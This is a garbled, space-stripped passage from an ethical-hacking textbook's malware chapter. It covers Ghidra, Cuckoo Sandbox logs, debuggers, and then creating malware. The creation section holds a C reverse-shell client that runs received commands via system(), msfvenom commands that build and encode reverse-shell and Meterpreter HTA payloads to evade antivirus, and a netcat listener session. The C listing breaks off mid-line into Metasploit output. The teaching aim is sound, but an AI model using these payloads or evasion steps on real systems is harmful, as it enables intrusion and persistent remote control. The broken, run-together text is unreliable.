GhidraanalysisOnceyouopenGhidra,itwillprovideyouwithmuchthesameinformationyouwouldgetfromadebugger.Thisincludesadisassemblyoftheexecutablecode.Youcanalsogetalistoffunctionsintheexecutable,aswellasanylibrariesthatareimportedorexported.FunctionMalwareAnalysis 339namesandlibrariesmayprovidesomeinsightintowhattheprogramisdoing.Programmerswilloftennamefunctionsinawaythatthenameindicateswhatthefunctiondoes.Thismakescodemorereadable,meaningyoucanfixanyproblemslater.Additionally,someoneelsecanmoreeasilyfixproblemslater.Figure 8.13showsthedetailsfromanexecutablefile.FIGURE 8.13 ExecutablefiledetailsOnereallynicefeatureofGhidraisthegraphingability.Youcangenerateagraphofthefunctionsinaprogram.Thiswillprovideyouthepathwaysthroughtheprogram.Functionsthatcallotherfunctionsareconnected,andthoseconnectionscanbeshowninagraph.Thiscanhelpyouseehowaprogrammayoperatebecauseyoucanseethefunctionsandhowtheyarecalledorhowexecutionmovesfromonefunctiontoanother.Thispracticeisreverseengineering,andittakesalotofunderstandingabouthowprogramsareconstructed.Youneedtobeabletoreadassemblylanguageaswellasunderstandinghowdifferentoperatingsystemsexpectexecutablestobeconstructed.Eachoperatingsystemhassomethingcalledanapplicationbinaryinterface,whichishowtheexecutableneedstointeractwiththeoperatingsystem.Anexecutableisacontainer,includingalotofmetadataabouttheprogramaswellasthesourcecode.Inaddition,youwillgetthesegmentsthatstoredatawrittenintotheprogrambywayofthesourcecode.Ghidracanhelpyoudecodetheexecutableifyouhavealittleknowledgeanddiligence.Overtimeyouwillgettheexpertisenecessarytomakethiswholeprocesseasier.340 Chapter8  Malware■ExecutableAssessmentGetacopyofGhidrafromghidra-­sre.org.UsingGhidra,openanyexecutable(program)andgenerateagraphoftheprogram.Identifypathwaysthroughtheprogram.DynamicAnalysisWhereasthepointofstaticanalysisistonotruntheprogram,adynamicanalysisisdonebyrunningtheprogramtoseewhatitdoes.Therearemultiplewaystodothiswithoutimpactingyourownsystembyinfectingitwithmalware.Thisiswherethechallengecomesfrom,ofcourse,whenitcomestodynamicanalysis.Youwanttobeabletoseewhatthebehavioriswithoutactuallyinfectingasystemyoucareabout.Youalsodon’twanttoputitintoasandboxthatstillhasnetworkaccessandisabletoinfectothersystemsonanetworkyoucareabout.However,youneedtohavethemalwarebelieveitisonarunningsystemandnotinasandbox.MalwarehasmultiplewaystodeterminewhetheritisrunningfromwithinaVM.First,itcancheckforanydriversprovidedbyVMware,sinceVMwareisacommonhypervisor.Itwillalsocheckthelocationofsomememorydatastructures.ItcanalsochecktheMACaddresstodetermineifthevendorID(thefirstthreebytes)matchesaVMprovider.MalwarethatdeterminesitisrunninginsideaVMmayopttonotdeploythepayload,makingitinert,whichmeansyouwon’tgettoseewhatitdoes.ThefirstapproachisjusttorunthemalwareinsideaVM.Thishastheadvantageofbeingabletocontrolthemachinecompletely,includingsettingupcontrolsonthenetworkinterfacetopreventitfromgettinganywhereyoudon’twantittogo.Also,withaVM,youcantakeadvantageofsnapshotstorestorethesystemtoaknowncleanstate.Thismeansyoucanrunthemalwareoverandoveragainstcleansystemstocontinuetoobservethebehavior.Italsogivesyoutheabilitytocomparesnapshots,soyoucanseethedifferencesbetweenacleansystemandoneafterrunningthemalware.AndyoucanperformanalysisonthememoryofasuspendedVM.SandboxAsandboxisaplacethatissafeforplaying.This,inthecaseofmalwareanalysis,isaplacewhereyoucanlookatthemalwarewithoutfearofimpactingothersystems.CuckooSandboxUsingyourownVMsetupcanbealotofwork,though.Youneedtogetitsetup,getanOSinstalled,andthengetasnapshotofitbeforeyourunthemalware.Afterthat,youneedMalwareAnalysis 341tocomparethesystemstates.Thereareeasierwaystoaccomplishthis.OneistouseanautomatedsystemthatwillrunthemalwareinsideaVMandthendothecomparisonforyou.Ifyoucouldgetareportbackattheend,thatwouldbeideal.Well,ifyouwerewishingforsomethinglikethat,youmaybepleasedtoknowit’savailable.CuckooSandboxisanautomatedmalwareanalysistool.IthandlesstartingupaVM,injectingthemalwareintoit,andthenperformingsomeanalysisonfiles,theRegistry,networkconnections,processactions,andmemory.CuckooSandboxisfreelyavailablesoftwarethatusesPythonformanagingtheVMandthereporting.YouwouldneedtohaveaWindowsVMandahypervisorthatCuckooSandboxcouldcontrol.Thesearenotnecessarilyfree.CertainlytheWindowsVMwillcostmoney,thoughyoucangenerallyuseafreelyavailablehypervisorlikeKVM(kernel-­basedvirtualmachine).Youdon’thavetouseyourownCuckooSandboxinstallation,though.Therearesomethatareavailableonline.Oneofthemismalwr.com;ithasbeendownforsometimebutisexpectedtocomeback,thoughthereiscurrentlynodateinsightforthat.YoucancheckwithLennyZeltser’sblogforalistofavailablesandboxestotestyourmalwarein.Forourpurposes,wearegoingtorunagainstanotherimplementationofCuckooSandbox,controlledbyHiekiPikker.YouuploadyoursampleandCuckooSandboxwillrunhashesagainstit,whichcanbeusedtocheckdatabasestoseeifthehashesareknown.Youcandothiswithoutrunningthesampleatall.Thesampleinthiscaseisonewe’velookedatbefore.It’sentirelybenign,thoughitdoesleaveafileonthedisk.It’sjustasimpleone-­linetextfile,sothereisnothingsuspiciousaboutitatall.However,wecanstilluseCuckooSandboxtoexecutetheprogramandreportbacktousonthebehavior.Figure 8.14showsdetailsaboutthesamplethatwasuploaded.Itshowsthetypeoffile,portableexecutable,32-­bit.Italsoshowsthedifferenthashvaluesfromthedifferentalgorithms,andthereisalsoanentryforYara,whichisalanguageusedtodescribemalwarefiles.FIGURE 8.14 CuckooSandboxdetails342 Chapter8  Malware■Beforerunningthesamplewehaveprovided,wecanmakesomechoicesabouttheenvironmentthatitrunsin.YoucanseetheseoptionsinFigure 8.15.Thisshowsusthatwecandeterminehowconstrainedwewanttheenvironment,includingthenetworkaccesswewanttoprovideforthesample.Insomecases,youmaynotwanttoprovidefullInternetaccessFIGURE 8.15 CuckooSandboxoptionsMalwareAnalysis 343becauseitmaygetoutofyourcontrol.Youmayfindyouwanttorestrictaccessthere.However,somemalwaremayjustnotdeployfullyifitcan’tgettheInternet.Youmayalsoneedtoprovidealongertimeoutbeforethesandboxclosesout.Youcandeterminehowlongyouwanttowaitbeforethesandboxtimesout.CuckooSandboxgivesyoutheabilitytoconfiguretherun,butyoudon’thaveto.We’regoingtousethedefaultsettingsandrunoursamplethroughthesandbox.Whileit’srunning,thestatuswillupdateperiodically.Whenthemalwaresampleisexecuted,CuckooSandboxgenerateslogsthatwecanlookat.Youcanseethelogsfromthesamplethatwassubmittedinthefollowingcodelisting.ThelogsprovidethedetailsofallthemonitoringandmanagementthatCuckooSandboxdoes.CuckooSandboxLogs2021-­01-­1702:54:09,015[analyzer]DEBUG:Startinganalyzerfrom:C:\tmp3oj4f_2021-­01-­1702:54:09,015[analyzer]DEBUG:Pipeservername:\??\PIPE\kSExGJIXHFbEHDFEKHEYNDsVlRQZEvm2021-­01-­1702:54:09,015[analyzer]DEBUG:Logpipeservername:\??\PIPE\zRhqTZBEUJoPjNIcpHbDUDobbOoFI2021-­01-­1702:54:09,280[analyzer]DEBUG:StartedauxiliarymoduleDbgView2021-­01-­1702:54:09,983[analyzer]DEBUG:StartedauxiliarymoduleDisguise2021-­01-­1702:54:10,171[analyzer]DEBUG:Loadedmonitorintoprocesswithpid4962021-­01-­1702:54:10,171[analyzer]DEBUG:StartedauxiliarymoduleDumpTLSMasterSecrets2021-­01-­1702:54:10,171[analyzer]DEBUG:StartedauxiliarymoduleHuman2021-­01-­1702:54:10,171[analyzer]DEBUG:StartedauxiliarymoduleInstallCertificate2021-­01-­1702:54:10,171[analyzer]DEBUG:StartedauxiliarymoduleReboot2021-­01-­1702:54:10,203[analyzer]DEBUG:StartedauxiliarymoduleRecentFiles2021-­01-­1702:54:10,217[analyzer]DEBUG:StartedauxiliarymoduleScreenshots2021-­01-­1702:54:10,217[analyzer]DEBUG:StartedauxiliarymoduleLoadZer0m0n2021-­01-­1702:54:10,265[lib.api.process]INFO:Successfullyexecutedprocessfrompathu'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\bogus.exe'witharguments''andpid22682021-­01-­1702:54:10,437[analyzer]DEBUG:Loadedmonitorintoprocesswithpid22682021-­01-­1702:54:10,437[analyzer]INFO:Addednewfiletolistwithpid2268andpathC:\Users\Administrator\AppData\Local\Temp\file.txt2021-­01-­1702:54:10,608[lib.api.process]INFO:Memorydumpofprocesswithpid2268completed344 Chapter8  Malware■2021-­01-­1702:54:11,312[analyzer]INFO:Processwithpid2268hasterminated2021-­01-­1702:54:11,328[analyzer]INFO:Processlistisempty,terminatinganalysis.2021-­01-­1702:54:12,328[analyzer]INFO:Analysiscompleted.CuckooSandboxtakesscreencapturesduringtherun.InFigure 8.16,youcanseetheinformationabouttherun,whichincludesathumbnailforthescreencapturethatwastakenwhilethesamplewasbeingrun.Additionally,wegetstatisticsabouttherun.Thisincludestheamountoftimeittookforthesystemtorunthesample.Wealsogetlinkstothelogs,someofwhichwelookedatearlier.Thisiswherewegetdetailsaboutwhathappenedtothesystem.Thedetailsabouttherunprovideuswithsomeinformation,thescreencapturecanprovideadditionaldetails,andthelogsgetgranular.Intheanalyzerlog,itshowsthatthesamplecreatedafileinthefilesystem.Wegetthepathandfilenameforthatfile.Iftherehadbeennetworkactivityfromthesample,wewouldhavebeenabletoseethataswell.FIGURE 8.16 CuckooSandboxresultsMalwareAnalysis 345UsingCuckooSandboxtakestheriskofrunningmalwareoffoursystemsandnetwork.However,ittakesthecontrolofrunningthemalwareawayfromusaswell.Therearecaseswhereyoumaywanttobeabletoseeexactlywhatthemalwareisdoingandbeabletoseethecodewhilethat’shappening.DebuggingUsingadebuggergivesyoucompletecontrolovertherunofyoursample.Ofcourse,italsoputstheproblemsthatmaycomewiththatmalwareinyourhands.Withthecontrolyougetfromadebugger,though,youcanpotentiallyskipoveranyreallybadactions.Beforewegotoofardownthepath,let’stalkaboutwhatadebuggeris.Adebuggergivesadevelopercontrolovertherunofaprogram,meaningthedevelopercangolinebylinethroughtheprogram.Inanintegrateddevelopmentenvironment(IDE),thedebuggerthat’sintegratedwouldcommonlygiveustheabilitytoworkthroughthesourcecodelinebylineandfunctionbyfunction.Wedon’thavethatluxury,though,whenwearetalkingaboutmalwareanalysis.Ifwehadthesourcecode,wewouldn’tneedtodoanyofthis.Insteadofsteppingthroughthesourcecodelinebyline,wewouldbeworkingthroughopcodebyopcode,sincewearelookingatthedisassemblyratherthanthesourcecode.Therearealotofdebuggersavailable.ThekingofdebuggersanddisassemblersisIDAPro.YoucanworkacrossmultipleprocessorarchitecturesandoperatingsystemswithIDAPro.YoumaynotneedallofthepowerthatcomeswithIDAPro,soyoucoulduseOllyDbg,theImmunityDebugger,ortheWindowsDebuggerfromMicrosoft.We’regoingtostartwithalookatusingthecommunityeditionofIDAratherthantheProversion,becauseitwillhaveeverythingweneed.It’simportanttokeepinmindthatCPUarchitectureisimportant.Ifyoutrytoloada64-­bitprogramintoa32-­bitdebugger,forinstance,youwon’tbeabletorunitthrough.A32-­bitdebuggerjustwon’tknowhowtohandlea64-­bitprogrambecausethedebuggerisrunningasa32-­bitprogram.MakesureyouarematchingCPUarchitectureintheprogramtoadebuggerthatcansupportthatCPUarchitecture.ThisisoneofthereasonsforusingacommercialtoollikeIDAPro.First,weneedtoloadupourexecutableintoIDAFree.Figure 8.17showsthesetofoptionsthatyoucanselectwhenyouareloadingafile.TheseareselectedbyIDA,butyoucanmakesomeadjustments.Forexample,IDAdeterminedthatthefileisa64-­bitportableexecutablebinary.Ifyousomehowknowit’snotthatandIDAhasmadeabaddetermination,youcouldchangethat.ItwouldbeunlikelyforIDAtonotknowbecauseallofthiscomesfrommetadatainthefile.However,ifyoureallywanttodosomethingdifferentfromwhatIDAisselecting,youcanmakechanges.346 Chapter8  Malware■FIGURE 8.17 NewIDAsessionIDAwillloadthefileandthenpresentyouwiththedisassemblyinmultipleways.Oneofthosewaysisessentiallyagraphview.Thegraphviewshowstheentryfunctionfollowedbypathwaystheprogramcantake.Thisprovidesavisualpaththroughtheprogram.Inourcase,it’sasimpleandsmallprogram.Thisviewisfarmorebeneficialifyouhavealargeprogramwithmultipleexecutionpaths.Youcouldtestthedifferentexecutionpathsbyfollowingthemvisuallyratherthantryingtokeeptrackofwhatyouaredoing.Figure 8.18showsaportionoftheinitialviewofthedisassembledprogram.Justforcomparisonpurposes,we’regoingtotakealookatOllyDbg,whichisafreewaredebugger.Oncewe’veloadedtheprogramintoOllyDbg,wegettheviewyoucanseeinFigure 8.19.OllyDbggetsstraighttothepoint.Yougetadisassemblyandthecorrespondinghexdump,showingyouwhatitlookslikeatthebytelevel.Youalsogetaviewoftheregistersandtheirvaluesontherightside.Thesevalueswillchangeastheprogramruns.It’seasiertoseethisifyouaresteppingthroughtheprogramoneoperationatatime.Thisgivesyouamuchbetterviewofhowtheprogramisoperatingandwhateachoperationisdoing.Ifyouweretojuststartofftheprogram,itwouldrunthroughtocompletionandyouwouldn’tseeanything.Asaresult,youneedtosetabreakpoint.Thebreakpointwillcauseexecutiontohaltattheplaceintheprogramyouwantitto.Youneedthistostopattheentrypointoftheprogramifyouwanttoseeeverythingthathappens.Todothat,youneedMalwareAnalysis 347FIGURE 8.18 IDAviewtolocatetheentrypointoftheprogram.Oneeasywaytodothatistomakeuseofthecallstack.Whentheprogramruns,eachfunctionisaddedtothecallstacksoyoucantracetheprogramthroughthefunctioncalls.Whenyouopenupthecallstackwindow,asyoucanseeinFigure 8.20,theverytopentryinthecallstackistheentrypoint.It’sthefirstfunctionthat’scalled.Togetthecallstack,youdoneedtorunthroughtheprogramonce.Onceyouhavethememoryaddresswheretheentrypointislocated,youcansetabreakpointbyright-­clickingtheoperationandtogglingthebreakpointfromthecontextmenu.Oncethebreakpointisinplace,youcanstarttherunoftheprogram.Assoonasyoustartit,theprogramwillstopbecauseofthebreakpoint.Togetitgoingagain,youcanstepthroughtheprogramalineatatime,oryoucouldjustallowtheprogramtocontinuetorun,eithertothenextbreakpointortothecompletionoftheprogram.Therearemultiplewaysofsteppingthroughtheprogram.Ifyoustepintoit,youwillfollowexecutionthroughallfunctions,includinglibraryfunctionsthatarepartoftheCstandardlibrary.Thismeansyouarehoppingaroundthroughmemory.Youcouldstepover,whichmeansyou’llcallthefunctionandjuststayintheareainmemorywhereyouhavebeen.348 Chapter8  Malware■FIGURE 8.19 OllyDbgviewWhenyouarelookingataLinuxprogram,youwilllikelyseestatementsshowingint0x80,whichcallsinterruptvector128(0x80).Thisindicatesyouaremakingasystemcall.Asystemcalliswhenyouaremakingarequestofthekernel/operatingsystem.InWindows,youcanstilldothat,butit’smorecommontoseecallstolibraryfunctionsthatwrapthesystemcalls.Theseapplicationprogramminginterfaces(APIs)makethecodemorestandardizedandprobablymoreoptimizedthancodethatmakesthesystemcalldirectly.FIGURE 8.20 CallstackCreatingMalware 349Callingalibraryfunctionisafairlysimpleprocess.Youusethecalloperation,passinginthememoryaddressofthefunctionyouarecalling.Indoingthis,justaswithanytimeyouareaddingastackframebyusingafunction,youneedtomakeadjustmentstostackpointers.Inthefollowingcodelisting,youcanseeasectionofassemblycodewherealibraryfunctioniscalledtwice.Justbeforecallingtheruntimelibraryfunction,iob_lb0,thestackpointerandinstructionpointerarestoredinpreparationforjumpingtoanewfunction.CallingLibraryFunctions|0x004012e0|0x004012e3|0x004012easet_app_type];0x408198|0x004012f0|0x004012f5|0x004012f9|0x00401300|0x00401300|0x00401303|0x0040130aset_app_type];0x408198|0x00401310|0x00401315\0x00401319/0x00401320subesp,0x1cmovdword[esp],1calldwordsym.imp.msvcrt.dllcallsub.msvcrt.dlliob_1b0leaesi,[esi]leaedi,[edi]_WinMainCRTStartup:subesp,0x1cmovdword[esp],2calldword[sym.imp.msvcrt.dllcallsub.msvcrt.dllleaesi,[esi]leaedi,[edi](fcn)sym._atexit6iob_1b0Thelibraryfunctionsmakefollowingtheprogrameasierbecausetheyarecalledbyname;sincethelibrariesarenamedandthefunctionshavelabels,theprocessorknowswhichmemoryspacetojumptoandwherewithinthatspace.Thelabelsarethefunctionnames,soyoucanatleastgetsomethingofahandleonpartoftheprogramwithouthavingtostepintothefunctiontowatcheveryoperation.CreatingMalwareTherearealotofplacestoacquiremalwaresamplesthatyoucanuse.Theproblemwithusingsomeoneelse’smalwarewhenyouaretestingisthatyoumaynotbefullyawareofeverythingthemalwaredoes.Ontopofthat,themalwaremaybetryingtocommunicatewithsystemsundersomeoneelse’scontrol.Asyouaretestingwithyourclients,youmayneedtomakeuseofmalware,oratleastgrayware.Keepinmindthatyouareboundtobehaveethically,whichmeansyoucan’tuseactualmalwarethatmaycausedamagetoasystem.Yourgoalmaybetomaintainaccesstoasystemwithoutbeingnoticed.Itmay350 Chapter8  Malware■alsobetoseeifyoucangetmalwareinjectedintothenetworkandontosystemswithoutdetection.Ifyouneedtostartfromscratch,thereareacoupleofapproachesyoucantake.Thefirstistojustwriteityourself.Thisrequiressomeabilitytoprogram.ThesecondisgenerallyeasierandmakesuseofMetasploit,sinceithassomanymodulesalreadyinplaceandthereisawaytogenerateastand-­aloneexecutable.WritingYourOwnIfyouhavesomeprogrammingexperience,oratleastawillingnesstojumpinandtrytolearn,youcantrytocreateyourownmalware.Asimplewaytodothisistojustcreateaprogramthatcouldperformwhateverfunctionyouneed.Forexample,youcouldwriteaclientthatcouldconnectbacktoanyhandlerornetcat-­basedlistener.Thisclientcouldgiveyouremoteaccesstothesystem,whichwouldbeuseful.Youwouldneedtousesomeotherattacktogetyourprogramontothesystem,butonceit’sthere,thesystemcouldbeunderyourcontrol.Youneedtopickaprogramminglanguagetowriteyourmalwarein.Therearealotofchoices.Pythoniscurrentlyapopularprogramminglanguage,andthereareenoughlibrariestosupportprettymuchanythingyoumaywanttodo.TheproblemwithPython,generally,isthatitrequiresaPythoninterpretertobeinstalledonthesystemrunningthescript.You’llfindmostsystemswon’thavePythoninstalled,andwhileyoumaybeabletogetPythoninstalled,it’sprobablyalotofwork.AlanguagelikeCistime-­testedandhasalotofsourcecodeavailableonlineforyoutopullpiecestocobbletogetheraworkingprogram.TherearePythoncompilersthatcantakeaPythonscriptandgenerateanexecutableforyou.IfyouarereallyinterestedinwritingPython,youmaybeabletousethisoption.WhereCisdifferentfromPythonisthatCisacompiledlanguage.Beforeyouhaveaprogram,youneedtotakeyoursourcecodeandrunitthroughacompilertogetaworkingprogram.Thebestwaytodothisistocompileyourprogramonthesameplatformasyourtarget.IfyouarelookingtoinstallthisprogramonaWindows32-­bitsystem,compilingitonaWindows32-­bitsystemwouldbeeasiest.Therearecross-­compilersavailablethatcangenerateaWindowsexecutableonaLinuxsystemandviceversa.Youcanevenmanage32-­bitversus64-­bitwiththerightlibrariesandcompiler.MostpeoplewillmakeuseofoneoftheMicrosoftIDEstobuildsoftwarein.That’salotofsoftwareforthekindsofprogramsyouwilllikelybewriting,andVisualStudioismoredesignedforprogramstomakeuseofWindowsAPIratherthanjuststandardClibraries.Thereareotheroptions.AminimalGNUenvironmentforWindows(MingW)cangiveyoucompilersonaWindowssystem.YoucanalsogoallinandgetafullGNUtoolset.CreatingMalware 351Thefollowingcodelistingisasmallprogramthathasminimalfunctionalitytoinitiateaconnectiontoasystem.Ontheremotesystem,youcanhavejustanetcatlistenerwaiting,oryoucouldhaveacustomprogramdesignedtolistentothissimpleclient.YoucouldalsomakeuseofahandlerfromaframeworklikeMetasploit.Theprogramyouseehere,compiledandtestedonaLinuxsystem,willconnecttotheIPaddressspecified.Thisisbadprogrammingpractice,buthard-­codinganIPaddressminimizesanyinteractionwiththesystemyouaretryingtoinfiltrate.Onegoodwaytohandleanaddresslikethiswouldbetoacceptitonthecommandlineortakeaconfigurationfile.Youdon’twantanyinteractionneededfromtheuser.So,youshouldknowyourIPaddressaheadoftime,andyoucanjustputitinhere,compiletheprogram,andsenditout.malclient.cProgram#include#include#include#include#include#include#include#includevoidhandleRequest(char*req){system(req);}intmain(intargc,char**argv){printf("Startingclient\n");structsockaddr_inaddr;structsockaddr_insrv;intsock,data=0;charbuffer[256];if((sock=socket(AF_INET,SOCK_STREAM,0))<0){printf("Errorcreatingsocket!Stopping...\n");return-­9;}352 Chapter8  Malware■memset(&srv,'0',sizeof(srv));srv.sin_family=AF_INET;srv.sin_port=htons(4444);if(inet_pton(AF_INET,"127.0.0.1",&srv.sin_addr)searcharch:x86platform:windowsreverse_tcpMatchingModules================NameDisclosureDateRankCheckDescription-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­-­payload/windows/dllinject/reverse_tcpnormalNoReflectiveDLLInjection,ReverseTCPStagerpayload/windows/dllinject/reverse_tcp_allportsnormalNoReflectiveDLLInjection,ReverseAll-­PortTCPStagerpayload/windows/dllinject/reverse_tcp_dnsnormalNoReflectiveDLLInjection,ReverseTCPStager(DNS)payload/windows/dllinject/reverse_tcp_rc4normalNoReflectiveDLLInjection,ReverseTCPStager(RC4StageEncryption,Metasm)354 Chapter8  Malware■payload/windows/dllinject/reverse_tcp_rc4_dnsnormalNoReflectiveDLLInjection,ReverseTCPStager(RC4StageEncryptionDNS,Metasm)payload/windows/dllinject/reverse_tcp_uuidnormalNoReflectiveDLLInjection,ReverseTCPStagerwithUUIDSupportWhenwecreatetheexecutablewearegoingtouse,weneedtousemsfvenom.Thiswilltakeoneofthepayloadscripts,writteninRuby,andcompileittoanoutputfilethatwespecify.Inthefollowinglisting,youcanseetheuseofmsfvenomtocreateanExecutableandLinkableFormat(ELF)file.ThisistheexecutableformatonLinuxsystems,liketheportableexecutable(PE)formatisforWindows.Thecommandlineindicatesthatwearecreatinganexecutableforanx86,meaning32-­bitsystem,runningLinux.ThepayloadisareverseshelloveraTCPconnectiononport4444.Thesystemwearegoingtobeconnectingtoislocatedat127.0.0.1,sinceit’sjustgoingtobeusedtoconnecttoanetcatlisteneronthelocalhost.Theoutputiscalledthepayload,thoughitcouldbecalledanything.Thisisthenameoftheexecutablethatweget.Attheendoftheoutput,youcanseethatthefileisanELFexecutablethatis32-­bit.TorunitonaLinuxsystem,though,youneedtosettheexecutablebit.Usingmsfvenomkilroy:~$msfvenom-­ax86-­plinux/x86/shell_reverse_tcplhost=127.0.0.1lport=4444-­felf-­-­platform=linux-­opayloadNoencoderorbadcharsspecified,outputtingrawpayloadPayloadsize:68bytesFinalsizeofelffile:152bytesSavedas:payloadkilroy:~$chmod+xpayloadkilroy:~$./payloadkilroy:~$filepayloadpayload:ELF32-­bitLSBexecutable,Intel80386,version1(SYSV),staticallylinked,nosectionheaderBeforerunningthepayloadthatwehaveinexecutableform,weneedtohaveournetcatlistenerrunning.Inthefollowingcodelisting,youcanseewhatitlookslikewhenwestartupnetcatontheporttowhichthepayloadwillbeconnecting.Whatyouwillnoticeisthatthereisnoindicationthatnetcatislisteningorthatithasreceivedaconnection.SinceIwassittinginfrontofbothends,IknewwhentheconnectionhadbeenmadesoIwasabletosendacommandbacktothepayloadprogramthatwasrunning.ThisisanadvantageofusingsomethinglikeaMeterpretershellandlistener.Whenyougetaconnectionthere,youwillbeabletoseewhenyougetaconnectionback.CreatingMalware 355netcatConnectionkilroy:~$nc-­lp4444lsDesktopDocumentsDownloadsEmpireMusicPicturesPublicTemplatesVideosclientclient.cdotfiles.tar.gzfontconfiggomailpayloadprltoolsrequest.ps1sps18-­129srcteamviewer_amd64.debOfcourse,aswithanyconnection,wehavethepermissionsoftheuserrunningtheprogram.Whatyoucanseeearlierisadirectorylistingofthehomedirectoryofaregularuser.Thisisthedirectoryfromwhichthepayloadprogramisrunning.Youarenotcappedthere,though.Youcanmovearoundthefilesystem,sincethereisnothingtojailyouwithinthedirectoryyouarein.Onethingyoumayrunintoisintrusiondetectionsystemsorantivirusprogramscatchingyourmalware.Forthisreason,Metasploitcanencodetheresultingprogram.Encodingitobscurestheactualpayloadsoitmaynotlooklikemalicioussoftwaretoaprogramlookingforit.Thiscanbedonebyjustaddingtheencodertothecommand-­lineparameterstomsfvenom.Inthefollowinglisting,youcanseethenecessaryparametertoaddoneofthecommonencoderstothepayload.Encodinga Payloadkilroy:~$msfvenom-­ax86-­plinux/x86/shell_reverse_tcplhost=127.0.0.1lport=4444-­felf-­-p­latform=linux-­ex86/shikata_ga_nai-­i5-­opayload356 Chapter8  Malware■Found1compatibleencodersAttemptingtoencodepayloadwith5iterationsofx86/shikata_ga_naix86/shikata_ga_naisucceededwithsize95(iteration=0)x86/shikata_ga_naisucceededwithsize122(iteration=1)x86/shikata_ga_naisucceededwithsize149(iteration=2)x86/shikata_ga_naisucceededwithsize176(iteration=3)x86/shikata_ga_naisucceededwithsize203(iteration=4)x86/shikata_ga_naichosenwithfinalsize203Payloadsize:203bytesFinalsizeofelffile:287bytesSavedas:payloadYoucanspecifythenumberofiterationsyouwanttousetopasstheresultingpayloadthroughtheencoder.Thereisnoparticularnumberthatworksbetterthananother.Themoretimesyoupassitthroughtheencoder,themoreyouareobscuringthepayloadcontainedintheexecutable.Ofcourse,runningitthroughoncewillobscurethepayload.However,ifsomeonehappenstoknowwhatonepayloadthat’sbeenpassedthroughanencoderonceortwicelookslike,thereisthechancethatitcouldbecaught.Thegoalistonotgetcaughtandtogetyourpayloadrun.GenerateMalwareGetacopyofMetasploit.YoucanobtainitfromRapid7orfromhttps://github.com/rapid7/metasploit-­framework.Usemsfvenomtogenerateanencodedexecutableforwhateverplatformyoulikeforthemetsvc_reverse_tcppayload.ObfuscatingThereareafewdifferentwaysyoucanobfuscatemalware.Thisisessentialsinceanti-­malwaresolutionsaregettingbetteratdetectingmalwarebasedoncommonpractices.Inadditiontoencryptionandpacking,youmayalsoconvertyourmalwaretootherexecutabletypes.OneoftheseisPowerShell.YoucaneasilygenerateobfuscatedPowerShellthatperformsalotofthesamecapabilitiesthattraditionalmalwaremayhave.Additionally,youmayuseotherapplicationstylesthatmaynotonlyhelpyougetaroundanti-­malwareprogramsbutalsomakeinfectioneasier.OnWindowssystems,youcanuseatechniquecalledHypertextMarkupLanguage(HTML)applications(HTA).ThesearesinglefilesthatincludeanentireexecutablebasedonusingHTMLforanydisplaythatmaybeneededinadditiontoascriptinglanguage,likeMalwareInfrastructure 357JavaScript.YoumayalsoseedynamicHTMLused.UsinganHTA,youcandeliveritusingawebsite.Thismaybeeasiertodeliverwithoutneedingtosendemailattachmentsthatcouldbeblocked.Youcanincludeanymaliciouscode,encoded,inthescriptingpartoftheHTA.It’salsoeasytocreatetheseapplicationsusingMetasploitjustasweusedtocreatesomesimplemalwareearlier.ThisishowyoucouldusemsfvenomtocreateanHTAthatincludesareverseTCPMeterpretershell.msfvenom-­pwindows/meterpreter/reverse_tcplhost=10.0.2.15lport=443-­ex86/shikata_ga_nai-­fhta-­psh-­oevil.htaUltimately,thegoalisalwaystogetmalicioussoftwareontoatargetsystem.Youwillbefightinglotsofprotectionsonsystemstogetthatmalicioussoftwarethrough.SinceWindowsrunsHTMLapplicationsusingaknownandtrustedWindowsexecutable,mshta.exe,youmaybeabletogetpastevenapplicationwhitelisting,whichcanbeeffectiveatprotectingagainstmalwarebyblockingallexecutablesthataren’tspecificallyallowed.Applicationwhitelisting,whilehighlyeffective,isalsodifficulttomanage,oratleastthoughttobedifficulttomanage.Itrequiresahighlystructuredenvironmentwhereallapplicationsarealwaysknown.MalwareInfrastructureYouwillhavenoticedthatwhenweputaprogramontoatargetsystem,thereisanotherendofthecommunicationstreamthatallowsaccesstothattargetsystem.Ifwewereinterestedonlyincausingmaliciousbehavior,itwouldn’tmatter.Thegoalwehaveistomaintainaccesstothesystembeyondtheinitialinfection.Commonly,youwillseethatcomplexmalwarehasinfrastructure.Wehadaserversetupthatourclientsoftwareconnectedtosowecouldissuecommands.Thisisasimplifiedversionofwhatyouwouldseeinthewild.YoumayhaveseennewsarticlesabouttheMiraiorKelihosbotnetsbeingtakendown.Botnetshavecommand-­and-­controlinfrastructurethatallowsanattackertosendcommandstothebots,whichareendpointsinabotnet.Figure 8.21showsalogicalrepresentationofwhatabotnetmightlooklike.Thisisessentiallyasingle-­tierC&Cnetwork.Alargebotnetwouldlikelyrequiremultipletiersofserverstocontrolmillionsofdevices.Thismaymeanasingledeviceatthetop,whichmanagesanumberofotherdevices.Eachofthosedevicesmaymanageanumberofothersbelowthem.Theattackerinterfaceswiththetop-­leveldevicetosendcommandstotheendpoints,tellingthemwhattodo.Thismaybesettingupawebinfrastructuretosellpharmaceuticals,forexample.Itmayalsobesendingoutunsolicitedcommercialemail(UCE,referredtocolloquiallyasspam)orstartingupadistributeddenial-­of-­serviceattack.Thereareafewprotocolsthatcouldbeusedtomanagethissortofinfrastructure.TherearetimesyoumayseetheInternetRelayChat(IRC)protocolusedtosendcommandstoendpoints.ThiswouldbedonebypostinganactionintoapreviouslyidentifiedIRCchannel.TheendpointswouldconnecttotheIRCserverandcheckthechannelfor358 Chapter8  Malware■FIGURE 8.21 